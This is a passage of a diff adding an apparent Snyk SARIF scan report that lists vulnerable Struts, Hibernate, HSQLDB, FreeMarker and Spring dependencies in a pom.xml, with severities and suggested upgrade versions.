+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.34" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.34" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.33" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.33" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-31501", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.34" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.34" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-31502", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.34" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.34" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.35" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.35" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5.31" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5.31" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-608098", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5.22" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5.22" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-609765", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-6100744", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5.32" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5.32" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30798", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.24.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.24.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30799", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.28" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.28" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30800", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.28" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.28" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30801", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.24.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.24.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30802", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30803", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-30804", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-451611", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.20.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.20.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-474418", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.20.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.20.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTSXWORK-5811864", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts.xwork:xwork-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts.xwork:xwork-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.24.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.24.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGFREEMARKER-1076795", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.freemarker:freemarker package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.freemarker:freemarker@2.3.19" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5.25" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5.25" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHIBERNATE-1041788", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.hibernate:hibernate-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hibernate:hibernate-core@4.3.7.Final" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHIBERNATE-584563", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.hibernate:hibernate-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hibernate:hibernate-core@4.3.7.Final" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHIBERNATE-30098", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.hibernate:hibernate-validator package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hibernate:hibernate-validator@4.3.1.Final" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHIBERNATE-568162", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.hibernate:hibernate-validator package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hibernate:hibernate-validator@4.3.1.Final" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHIBERNATE-569100", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.hibernate:hibernate-validator package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hibernate:hibernate-validator@4.3.1.Final" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGHSQLDB-3040860", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.hsqldb:hsqldb package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.hsqldb:hsqldb@2.3.2" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-1009832", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@4.3.29.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@4.3.29.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30163", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@3.2.9.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@3.2.9.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30164", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@3.2.14.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@3.2.14.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-30165", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@3.2.15.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@3.2.15.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31331", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@3.2.8.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@3.2.8.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6261586", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.3.32" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.3.32" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6444790", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a high severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.3.33" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.3.33" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-6597980", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-web package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-web@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.3.34" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.3.34" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2329097", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-core package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-core@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.2.18.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.2.18.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2330878", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-core@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.2.19.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.2.19.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-31325", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-core package with a medium severity vulnerability." 
+ }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-core@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@3.2.9.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@3.2.9.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2434828", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.springframework:spring-expression package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.springframework:spring-expression@3.2.6.RELEASE" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.springframework:spring-web@5.0.0.RELEASE" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.springframework:spring-web@5.0.0.RELEASE" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": 